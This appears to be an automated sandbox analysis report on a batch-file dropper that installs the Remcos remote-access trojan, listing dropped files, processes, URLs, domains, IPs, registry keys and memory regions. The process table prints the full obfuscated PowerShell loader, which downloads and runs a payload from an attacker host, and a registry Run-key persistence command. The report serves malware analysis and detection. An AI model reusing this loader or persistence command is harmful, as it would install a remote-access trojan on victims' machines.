Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
rEXSP5634HISP9005STMSDSDOKUME74247linierelet.bat
|
ASCII text, with very long lines (5674), with no line terminators
|
initial sample
|
 |
|
|
C:\ProgramData\remcos\logs.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0dv2aynn.22h.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1yvp1sen.yjk.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fb5mf3nb.s1k.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vshfqw3p.ien.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VM7QWPDENMIN1NEHI4X8.temp
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Overtidsbetalings.Del
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rEXSP5634HISP9005STMSDSDOKUME74247linierelet.bat" "
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe -windowstyle hidden " <#Pseudobegivenhedens Implume Tehsildar Indskudsbrt burreskrmenes #>;$Pligtmenneskers='Solfegens';<#Splenomegalia
Muoniums Plateauing Endomitosis Anisidin Uncial #>;$Chromoisomerism=$Pediculus+$host.UI; function Dtente($Sizier){If ($Chromoisomerism)
{$Brugeradgangskodernes++;}$Trangam=$Bedighted34+$Sizier.'Length'-$Brugeradgangskodernes; for( $John=4;$John -lt $Trangam;$John+=5){$Tremplin=$John;$Okkupationsmagters+=$Sizier[$John];$Nucleolocentrosome='Sodavander';}$Okkupationsmagters;}function
Trindt94($Confluxes){ & ($Afhjemledes) ($Confluxes);}$Silicomethane=Dtente 'striM SlioPaa,zTraniun.tlDirel ena Non/Sand
';$Silicomethane+=Dtente 'Term5,che.St c0 oo Temp( eknWTh.niF yvnForad ToporeitwUnwis Ann FlopNpur TMilh far1Bill0Cryp.smad0C
no;Lage AjoWListi H.on Ent6Fors4 Tri;Byr. SlixSi,d6.eso4Sp n; Inc RadirwillvHyp :Kalm1 Min3.ege1Resp.Dvrg0 Pas)Laes SufG
Re eB,erc aktk RucoEphe/Atry2Af.t0 Met1stri0 ens0 Beh1Iled0Gips1 Non Kur,FIn.kiTyderForeeaandfEngeoKommxAfsv/Jeop1 Ant3Stif1Skov.Kifs0
.nt ';$Reunify=Dtente 'prisUArbeSGelsECrysRSelv-Se iAMarlGUn eE Yden InltUmis ';$Geophones=Dtente 'CytohMiratsalstStr p Sy
s Di : For/Font/Dngep Mo.lcampi A,teK bblFl,ntRecodUn.e.BindtWeiroKantpUnpl/taasMNatiiCounsE.emoAlkagEartyTerrnUnstiByg sS
amtTe.tsObno.OverpTemifStram B y ';$Ancienty=Dtente 'Udgi> Out ';$Afhjemledes=Dtente 'LaboiCresE Na xH.nd ';$Afmarchernes='Militre';$Glendon='\Overtidsbetalings.Del';Trindt94
(Dtente 'Udpe$ yvgAfdrl SulOextrb mpaOve L ods:EskaR yanoWedgo ,oss N neTarc1Lane1Gaas0Ansk=Lati$Sma eI denS.orv En,:RestaBrugPPustPAdfrD
enuABetitL ciaarge+Pre $SpergMod lGuerEGeocnBe yDungao,rannMidt ');Trindt94 (Dtente ' opl$EfteGAd iLSistoNrreBH lva OvelR,ig:UngeuRecaNUnprDFutuEFungT
nduERigeRHer.ISte.OPardR Mera ataT My.iDeconInlegPatr= Far$ Ming Grue uldo Sn.p lokH AfvoLag,nOverE AutSSkri.t.voSPlaiP Ma.LencoiambutPros(
han$nonraAvenNTambCAn,sI uptEBrutn,ravt FriYWfru) Plo ');Trindt94 (Dtente ' atr[ oneNIn,reSi itCamb.NonfsSpl eFrilrSqueVOveriCaroCefteEsektP
P ioTogsi P.tNUdvlTSkovmAcetapre nEk.ea SunGJahvEBeterSove] K,y:Scle:Srt SChareHj tCForbUAppeRRensiDefeT SibYMatrpGarirCandoKlimT
RtwOGravcistiODichlKrab Ind = Co ove [OverN mpae.rest Ce..larySTince ranc Auru ThwrFluoiAdrat TakYEdifPMediRStupo Kont PiloSanecTr
loBukslKiloTDiasyInkvP uaE Gra]G,os: Eri:PrettS bolEry Sdisk1Kr d2Rev, ');$Geophones=$Undeteriorating[0];$Kniplens=(Dtente
'Lset$Skv,gForsLbilfofr sB ManAM dsL Cat: .abgBa.ieP neS RomT Br,uDesiS eaE arsr rennVrtrEForm= ren Sile CcmWUdla-Inflo
NonB RinjHesteB nbCVrksTkupf Bro SU gaYo slSNomoTA.ciEkateM Sup.AffoNRackEIntetEmbo.ParaW HorE.ndsBunclC BillaflviCarbE R.gNFlo
TDeb, ');Trindt94 ($Kniplens);Trindt94 (Dtente 'Epor$ReceGSodaeVa is,reet OveuLap,sPa aeMo,irTyngnRealejord.Su,tHPorte choa
TwidEmsce NonrAftvsKera[Eloi$TobaRRengeTer uKononSaddiPostfS,ntytal ] Niv=Anse$SkakSSpiniGennl Ma i Co,ceffoo NonmP,roe MectBredh
lfmanonenWrise Mae ');$Lumpingly=Dtente ' ssi$C unGFo be Orks umrt,riauCrousBrmeeD tar remnGidseFeto.,rdkD opioSanawOttenUnefl
TotoIndtaRnk,dUdebF Mari UdllVaabeBrdr( Kas$CirkGCaseePoz o rthpStenhS ako orrnUdvieWeddsCloi,Stan$Pla AOplyaNastuorro)Fili
';$Aau=$Roose110;Trindt94 (Dtente ',ffo$Do.kgStopLC,mpOripsBHaraAS lilKn c:P ctNIndeEEffld uesMa,ylTrilaGastG orft RulEShe,n
AgndO,ereJob.= ags(Assut Hy eNonrsOvertrest-S pePJambaBevitGalih Sta Fad$ObelAPre a LevuAmet) Fab ');while (!$Nedslagtende)
{Trindt94 (Dtente 'unex$KopigRaffl GenoIrrebina.aWuchlT.ch:TeboPHieriIndvlMedifU.efe Fr,r .aaeQtd rSubdstzar=Inex$,ikttSandrO
ttuAr bea ar ') ;Trindt94 $Lumpingly;Trindt94 (Dtente ' yposKupeTKrykale erEmbrTKoge- Ca,SPo yLT caeSkate Prop Bel Skov4fant
');Trindt94 (Dtente 'Abb $Ma.lgDewhl K aoStinBSansAUds lR nd:Bru N l vE Raad KomsSal lIn eaOuttG vertmi rEForrnDi hDBinreArti=Gluc(
nmitTykke AkksAukttVa,i-HorapNa.pATi cTMo khDeco Uso,$ samARemoA Q auAcqu)Plad ') ;Trindt94 (Dtente 'Drtr$ rkeG.undLAfkoO
ArrBStifARiveLsupe: ,awBFemin R wNJordeFjerNDigt=Begr$P ragParilFagmoFi gbL,ndAThorL Kyn:Aho,SJen tUpstEIndtl,ntrlSophe Em.R
draIDerid Be +Auto+ Re % F.u$ Cytu Galn GeldBieneUdreTGlobEKuv R U,miIst o.eknrChocAbradtPapii de nSev gA,ta.M crC TaloSy
oUAr mNChevTEn,a ') ;$Geophones=$Undeteriorating[$Bnnen];}$Ahorntrets=344157;$Sknhedsdronningerne=29981;Trindt94 (Dtente 'Angl$PoligHv.vl.agrO
YesB riASpidLForb: PreATophlOp kQModeULftei M sfIm.rO ForU Ers1Vare1P,ll9Prog Tam =Treh MyriGChefEBasitRens-Sedac GlaO br.nLo.iTKao
E crunSandTNone Mini$BifiABarra UdfU Aut ');Trindt94 (Dtente 'Bi l$O tmgInd lQuinoLecab CoraF,rhlNati:Ba.gSSrprt Hino NavfOvermT
aanFomegTarrd F,ae ArbnRe es Bun As e= Bur B nk[XenoSErkeyRecksApnet D,deKnojmKron.InteC hi,oProln SutvS,nke roar Sv tGri
] Cho:Best:Te eFKamprIntroRet mForsBUnreaUplisSubee Spe6 An 4 keSHarptInter ideiSpecnAdd gUran(Rat $ProsAC ocl RigqMalfuSkagiAmidfHoeroMoniuComf1Stri1Feli9
Mas)Sp,n ');Trindt94 (Dtente ' ype$Be.oGCousLRa dOKameBFru aU mil run:hoveDpotaaRockRErhvKPyrhsFil, Mou=Syvm Bere[ rinSfrdsY
MasS Rvet KleETilmmFisk.Syntt HjeeUninXU.iltmikr. niteBjarNUmbrcPar o roaDcongiTromnmouzg X n]Stra:Pate: DivaAfsysPterCMariIHuleiN.nf.
afsgEufoeDeraTNonpsS,leTC onrIndlIBoofN Sapg cyc( nte$Roqus EjetMurnoUndefnuptm ReknStikGCuidd Ph EHertNStensuini) Sa ');Trindt94
(Dtente 'Tils$HansgMontLVv.ro re.BPrv ACololHema:.ootH ffoF.emvdiffeDye kBi.bA KatTramiaPr,fl S bOVs nGTi,seHel tVe,m=Dipl$EngldIndiARestRVigekReviS
Nu.. NonsUnreuOut.bLev,SPh.etBorgRSjklIR glnRapsGRe.i(Knla$FeteaVenlHAktioTongrStdenSti TFor rCongeSo.iT,iliSP,nt,sluk$AftasDds.kGud,nMetahE,zoEUnweDK,ivsparedKo,tRfleeoFugtN
patnDeciIsupeNTromgDypneMelaRTrusNDer EMas )An i ');Trindt94 $Hovekataloget;"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Pseudobegivenhedens Implume Tehsildar Indskudsbrt burreskrmenes
#>;$Pligtmenneskers='Solfegens';<#Splenomegalia Muoniums Plateauing Endomitosis Anisidin Uncial #>;$Chromoisomerism=$Pediculus+$host.UI;
function Dtente($Sizier){If ($Chromoisomerism) {$Brugeradgangskodernes++;}$Trangam=$Bedighted34+$Sizier.'Length'-$Brugeradgangskodernes;
for( $John=4;$John -lt $Trangam;$John+=5){$Tremplin=$John;$Okkupationsmagters+=$Sizier[$John];$Nucleolocentrosome='Sodavander';}$Okkupationsmagters;}function
Trindt94($Confluxes){ & ($Afhjemledes) ($Confluxes);}$Silicomethane=Dtente 'striM SlioPaa,zTraniun.tlDirel ena Non/Sand
';$Silicomethane+=Dtente 'Term5,che.St c0 oo Temp( eknWTh.niF yvnForad ToporeitwUnwis Ann FlopNpur TMilh far1Bill0Cryp.smad0C
no;Lage AjoWListi H.on Ent6Fors4 Tri;Byr. SlixSi,d6.eso4Sp n; Inc RadirwillvHyp :Kalm1 Min3.ege1Resp.Dvrg0 Pas)Laes SufG
Re eB,erc aktk RucoEphe/Atry2Af.t0 Met1stri0 ens0 Beh1Iled0Gips1 Non Kur,FIn.kiTyderForeeaandfEngeoKommxAfsv/Jeop1 Ant3Stif1Skov.Kifs0
.nt ';$Reunify=Dtente 'prisUArbeSGelsECrysRSelv-Se iAMarlGUn eE Yden InltUmis ';$Geophones=Dtente 'CytohMiratsalstStr p Sy
s Di : For/Font/Dngep Mo.lcampi A,teK bblFl,ntRecodUn.e.BindtWeiroKantpUnpl/taasMNatiiCounsE.emoAlkagEartyTerrnUnstiByg sS
amtTe.tsObno.OverpTemifStram B y ';$Ancienty=Dtente 'Udgi> Out ';$Afhjemledes=Dtente 'LaboiCresE Na xH.nd ';$Afmarchernes='Militre';$Glendon='\Overtidsbetalings.Del';Trindt94
(Dtente 'Udpe$ yvgAfdrl SulOextrb mpaOve L ods:EskaR yanoWedgo ,oss N neTarc1Lane1Gaas0Ansk=Lati$Sma eI denS.orv En,:RestaBrugPPustPAdfrD
enuABetitL ciaarge+Pre $SpergMod lGuerEGeocnBe yDungao,rannMidt ');Trindt94 (Dtente ' opl$EfteGAd iLSistoNrreBH lva OvelR,ig:UngeuRecaNUnprDFutuEFungT
nduERigeRHer.ISte.OPardR Mera ataT My.iDeconInlegPatr= Far$ Ming Grue uldo Sn.p lokH AfvoLag,nOverE AutSSkri.t.voSPlaiP Ma.LencoiambutPros(
han$nonraAvenNTambCAn,sI uptEBrutn,ravt FriYWfru) Plo ');Trindt94 (Dtente ' atr[ oneNIn,reSi itCamb.NonfsSpl eFrilrSqueVOveriCaroCefteEsektP
P ioTogsi P.tNUdvlTSkovmAcetapre nEk.ea SunGJahvEBeterSove] K,y:Scle:Srt SChareHj tCForbUAppeRRensiDefeT SibYMatrpGarirCandoKlimT
RtwOGravcistiODichlKrab Ind = Co ove [OverN mpae.rest Ce..larySTince ranc Auru ThwrFluoiAdrat TakYEdifPMediRStupo Kont PiloSanecTr
loBukslKiloTDiasyInkvP uaE Gra]G,os: Eri:PrettS bolEry Sdisk1Kr d2Rev, ');$Geophones=$Undeteriorating[0];$Kniplens=(Dtente
'Lset$Skv,gForsLbilfofr sB ManAM dsL Cat: .abgBa.ieP neS RomT Br,uDesiS eaE arsr rennVrtrEForm= ren Sile CcmWUdla-Inflo
NonB RinjHesteB nbCVrksTkupf Bro SU gaYo slSNomoTA.ciEkateM Sup.AffoNRackEIntetEmbo.ParaW HorE.ndsBunclC BillaflviCarbE R.gNFlo
TDeb, ');Trindt94 ($Kniplens);Trindt94 (Dtente 'Epor$ReceGSodaeVa is,reet OveuLap,sPa aeMo,irTyngnRealejord.Su,tHPorte choa
TwidEmsce NonrAftvsKera[Eloi$TobaRRengeTer uKononSaddiPostfS,ntytal ] Niv=Anse$SkakSSpiniGennl Ma i Co,ceffoo NonmP,roe MectBredh
lfmanonenWrise Mae ');$Lumpingly=Dtente ' ssi$C unGFo be Orks umrt,riauCrousBrmeeD tar remnGidseFeto.,rdkD opioSanawOttenUnefl
TotoIndtaRnk,dUdebF Mari UdllVaabeBrdr( Kas$CirkGCaseePoz o rthpStenhS ako orrnUdvieWeddsCloi,Stan$Pla AOplyaNastuorro)Fili
';$Aau=$Roose110;Trindt94 (Dtente ',ffo$Do.kgStopLC,mpOripsBHaraAS lilKn c:P ctNIndeEEffld uesMa,ylTrilaGastG orft RulEShe,n
AgndO,ereJob.= ags(Assut Hy eNonrsOvertrest-S pePJambaBevitGalih Sta Fad$ObelAPre a LevuAmet) Fab ');while (!$Nedslagtende)
{Trindt94 (Dtente 'unex$KopigRaffl GenoIrrebina.aWuchlT.ch:TeboPHieriIndvlMedifU.efe Fr,r .aaeQtd rSubdstzar=Inex$,ikttSandrO
ttuAr bea ar ') ;Trindt94 $Lumpingly;Trindt94 (Dtente ' yposKupeTKrykale erEmbrTKoge- Ca,SPo yLT caeSkate Prop Bel Skov4fant
');Trindt94 (Dtente 'Abb $Ma.lgDewhl K aoStinBSansAUds lR nd:Bru N l vE Raad KomsSal lIn eaOuttG vertmi rEForrnDi hDBinreArti=Gluc(
nmitTykke AkksAukttVa,i-HorapNa.pATi cTMo khDeco Uso,$ samARemoA Q auAcqu)Plad ') ;Trindt94 (Dtente 'Drtr$ rkeG.undLAfkoO
ArrBStifARiveLsupe: ,awBFemin R wNJordeFjerNDigt=Begr$P ragParilFagmoFi gbL,ndAThorL Kyn:Aho,SJen tUpstEIndtl,ntrlSophe Em.R
draIDerid Be +Auto+ Re % F.u$ Cytu Galn GeldBieneUdreTGlobEKuv R U,miIst o.eknrChocAbradtPapii de nSev gA,ta.M crC TaloSy
oUAr mNChevTEn,a ') ;$Geophones=$Undeteriorating[$Bnnen];}$Ahorntrets=344157;$Sknhedsdronningerne=29981;Trindt94 (Dtente 'Angl$PoligHv.vl.agrO
YesB riASpidLForb: PreATophlOp kQModeULftei M sfIm.rO ForU Ers1Vare1P,ll9Prog Tam =Treh MyriGChefEBasitRens-Sedac GlaO br.nLo.iTKao
E crunSandTNone Mini$BifiABarra UdfU Aut ');Trindt94 (Dtente 'Bi l$O tmgInd lQuinoLecab CoraF,rhlNati:Ba.gSSrprt Hino NavfOvermT
aanFomegTarrd F,ae ArbnRe es Bun As e= Bur B nk[XenoSErkeyRecksApnet D,deKnojmKron.InteC hi,oProln SutvS,nke roar Sv tGri
] Cho:Best:Te eFKamprIntroRet mForsBUnreaUplisSubee Spe6 An 4 keSHarptInter ideiSpecnAdd gUran(Rat $ProsAC ocl RigqMalfuSkagiAmidfHoeroMoniuComf1Stri1Feli9
Mas)Sp,n ');Trindt94 (Dtente ' ype$Be.oGCousLRa dOKameBFru aU mil run:hoveDpotaaRockRErhvKPyrhsFil, Mou=Syvm Bere[ rinSfrdsY
MasS Rvet KleETilmmFisk.Syntt HjeeUninXU.iltmikr. niteBjarNUmbrcPar o roaDcongiTromnmouzg X n]Stra:Pate: DivaAfsysPterCMariIHuleiN.nf.
afsgEufoeDeraTNonpsS,leTC onrIndlIBoofN Sapg cyc( nte$Roqus EjetMurnoUndefnuptm ReknStikGCuidd Ph EHertNStensuini) Sa ');Trindt94
(Dtente 'Tils$HansgMontLVv.ro re.BPrv ACololHema:.ootH ffoF.emvdiffeDye kBi.bA KatTramiaPr,fl S bOVs nGTi,seHel tVe,m=Dipl$EngldIndiARestRVigekReviS
Nu.. NonsUnreuOut.bLev,SPh.etBorgRSjklIR glnRapsGRe.i(Knla$FeteaVenlHAktioTongrStdenSti TFor rCongeSo.iT,iliSP,nt,sluk$AftasDds.kGud,nMetahE,zoEUnweDK,ivsparedKo,tRfleeoFugtN
patnDeciIsupeNTromgDypneMelaRTrusNDer EMas )An i ');Trindt94 $Hovekataloget;"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\SysWOW64\msiexec.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Diversify" /t REG_EXPAND_SZ
/d "%Dowdily% -windowstyle 1 $Wasnt=(gp -Path 'HKCU:\Software\ledernes\').Snarliest;%Dowdily% ($Wasnt)"
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\SysWOW64\reg.exe
|
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Diversify" /t REG_EXPAND_SZ /d "%Dowdily% -windowstyle
1 $Wasnt=(gp -Path 'HKCU:\Software\ledernes\').Snarliest;%Dowdily% ($Wasnt)"
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
pelele.duckdns.org
|
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://plieltd.top
|
unknown
|
||
|
https://plieltd.top/Misogynists.pfm
|
104.21.56.189
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
https://plieltd.top
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
http://www.microsoft.co
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://plieltd.top/P
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://plieltd.top/sNFAyMOQkRdGglJM44.binfaltsTrogaranticonstruct.ro/sNFAyMOQkRdGglJM44.bin
|
unknown
|
||
|
http://www.microsoft.coU
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://plieltd.top/
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://plieltd.top/Misogynists.pfmP
|
unknown
|
||
|
https://plieltd.top/sNFAyMOQkRdGglJM44.bin&
|
unknown
|
||
|
https://plieltd.top/sNFAyMOQkRdGglJM44.bin
|
104.21.56.189
|
There are 14 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
pelele.duckdns.org
|
192.169.69.26
|
|
|
|
plieltd.top
|
104.21.56.189
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
192.169.69.26
|
pelele.duckdns.org
|
United States
|
|
|
|
104.21.56.189
|
plieltd.top
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER\SOFTWARE\ledernes
|
Snarliest
|
||
|
HKEY_CURRENT_USER\Environment
|
Dowdily
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-TXCR8B
|
exepath
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-TXCR8B
|
licence
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-TXCR8B
|
time
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
Diversify
|
There are 10 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
4F96000
|
remote allocation
|
page execute and read and write
|
|
|
|
8920000
|
heap
|
page read and write
|
|
|
|
568C000
|
trusted library allocation
|
page read and write
|
|
|
|
891A000
|
heap
|
page read and write
|
|
|
|
82A0000
|
direct allocation
|
page execute and read and write
|
|
|
|
8951000
|
heap
|
page read and write
|
|
|
|
891A000
|
heap
|
page read and write
|
|
|
|
9E76000
|
direct allocation
|
page execute and read and write
|
|
|
|
272A04C0000
|
trusted library allocation
|
page read and write
|
|
|
|
894D000
|
heap
|
page read and write
|
|
|
|
7EB0000
|
heap
|
page read and write
|
||
|
2728E700000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B780000
|
trusted library allocation
|
page read and write
|
||
|
272921D1000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BB10000
|
trusted library allocation
|
page read and write
|
||
|
7B77000
|
stack
|
page read and write
|
||
|
5547000
|
trusted library allocation
|
page read and write
|
||
|
8340000
|
direct allocation
|
page read and write
|
||
|
272A8660000
|
heap
|
page execute and read and write
|
||
|
272A886D000
|
heap
|
page read and write
|
||
|
8350000
|
direct allocation
|
page read and write
|
||
|
272921D6000
|
trusted library allocation
|
page read and write
|
||
|
2B1A000
|
heap
|
page read and write
|
||
|
81F0000
|
trusted library allocation
|
page read and write
|
||
|
D10000
|
heap
|
page read and write
|
||
|
272A887D000
|
heap
|
page read and write
|
||
|
8916000
|
heap
|
page read and write
|
||
|
A9ED87E000
|
stack
|
page read and write
|
||
|
4EB8000
|
trusted library allocation
|
page read and write
|
||
|
2728E6D0000
|
trusted library allocation
|
page read and write
|
||
|
6EEB000
|
heap
|
page read and write
|
||
|
2E04000
|
heap
|
page read and write
|
||
|
272A8853000
|
heap
|
page read and write
|
||
|
A9ED5F9000
|
stack
|
page read and write
|
||
|
7F8A000
|
heap
|
page read and write
|
||
|
A9ED97E000
|
stack
|
page read and write
|
||
|
8880000
|
heap
|
page read and write
|
||
|
2A2D000
|
stack
|
page read and write
|
||
|
7CE0000
|
trusted library allocation
|
page read and write
|
||
|
2728E62F000
|
heap
|
page read and write
|
||
|
27290FEA000
|
trusted library allocation
|
page read and write
|
||
|
272A070B000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B965000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B970000
|
trusted library allocation
|
page execute and read and write
|
||
|
81CC000
|
stack
|
page read and write
|
||
|
2728E490000
|
heap
|
page read and write
|
||
|
7FFD9B782000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B836000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B962000
|
trusted library allocation
|
page read and write
|
||
|
B60000
|
heap
|
page read and write
|
||
|
294E000
|
stack
|
page read and write
|
||
|
2728E5EC000
|
heap
|
page read and write
|
||
|
2728E5EA000
|
heap
|
page read and write
|
||
|
6396000
|
remote allocation
|
page execute and read and write
|
||
|
2728E5F2000
|
heap
|
page read and write
|
||
|
2728FF48000
|
heap
|
page read and write
|
||
|
A9ED6F8000
|
stack
|
page read and write
|
||
|
242B0000
|
heap
|
page read and write
|
||
|
7F99000
|
heap
|
page read and write
|
||
|
7FFD9BAB0000
|
trusted library allocation
|
page read and write
|
||
|
8959000
|
heap
|
page read and write
|
||
|
8200000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
|
23E10000
|
direct allocation
|
page read and write
|
||
|
7FFD9BA80000
|
trusted library allocation
|
page read and write
|
||
|
7B90000
|
trusted library allocation
|
page read and write
|
||
|
272A8670000
|
heap
|
page read and write
|
||
|
68AD000
|
stack
|
page read and write
|
||
|
5686000
|
trusted library allocation
|
page read and write
|
||
|
23E20000
|
direct allocation
|
page read and write
|
||
|
A9ED9FB000
|
stack
|
page read and write
|
||
|
8290000
|
trusted library allocation
|
page read and write
|
||
|
6EDF000
|
heap
|
page read and write
|
||
|
6BAE000
|
heap
|
page read and write
|
||
|
2E04000
|
heap
|
page read and write
|
||
|
6D1E000
|
stack
|
page read and write
|
||
|
891E000
|
heap
|
page read and write
|
||
|
8730000
|
heap
|
page read and write
|
||
|
7FBE000
|
heap
|
page read and write
|
||
|
27290FD0000
|
trusted library allocation
|
page read and write
|
||
|
272923F0000
|
trusted library allocation
|
page read and write
|
||
|
2728E750000
|
trusted library allocation
|
page read and write
|
||
|
272A84D7000
|
heap
|
page read and write
|
||
|
7E15000
|
trusted library allocation
|
page read and write
|
||
|
23EB0000
|
heap
|
page read and write
|
||
|
7FFD9B783000
|
trusted library allocation
|
page execute and read and write
|
||
|
2B6F000
|
heap
|
page read and write
|
||
|
2DEB000
|
heap
|
page read and write
|
||
|
B50000
|
heap
|
page read and write
|
||
|
891A000
|
heap
|
page read and write
|
||
|
8943000
|
heap
|
page read and write
|
||
|
27290FF8000
|
trusted library allocation
|
page read and write
|
||
|
43EE000
|
stack
|
page read and write
|
||
|
8330000
|
trusted library allocation
|
page execute and read and write
|
||
|
2C10000
|
heap
|
page read and write
|
||
|
8913000
|
heap
|
page read and write
|
||
|
25DE000
|
stack
|
page read and write
|
||
|
69EA000
|
stack
|
page read and write
|
||
|
7FFD9BA70000
|
trusted library allocation
|
page read and write
|
||
|
B0E000
|
stack
|
page read and write
|
||
|
6CDE000
|
stack
|
page read and write
|
||
|
2B5D000
|
stack
|
page read and write
|
||
|
7FFD9B9D0000
|
trusted library allocation
|
page read and write
|
||
|
A9EE4CD000
|
stack
|
page read and write
|
||
|
C80000
|
heap
|
page read and write
|
||
|
272A0451000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BB00000
|
trusted library allocation
|
page read and write
|
||
|
23E6E000
|
stack
|
page read and write
|
||
|
7FFD9B866000
|
trusted library allocation
|
page execute and read and write
|
||
|
43AE000
|
stack
|
page read and write
|
||
|
2A9C000
|
heap
|
page read and write
|
||
|
272A0460000
|
trusted library allocation
|
page read and write
|
||
|
840000
|
trusted library allocation
|
page read and write
|
||
|
82C0000
|
direct allocation
|
page read and write
|
||
|
2728E634000
|
heap
|
page read and write
|
||
|
810000
|
trusted library allocation
|
page read and write
|
||
|
6C9E000
|
stack
|
page read and write
|
||
|
D076000
|
direct allocation
|
page execute and read and write
|
||
|
7FFD9B83C000
|
trusted library allocation
|
page execute and read and write
|
||
|
6F90000
|
trusted library allocation
|
page read and write
|
||
|
2728E5E5000
|
heap
|
page read and write
|
||
|
8921000
|
heap
|
page read and write
|
||
|
7F50000
|
heap
|
page read and write
|
||
|
4636000
|
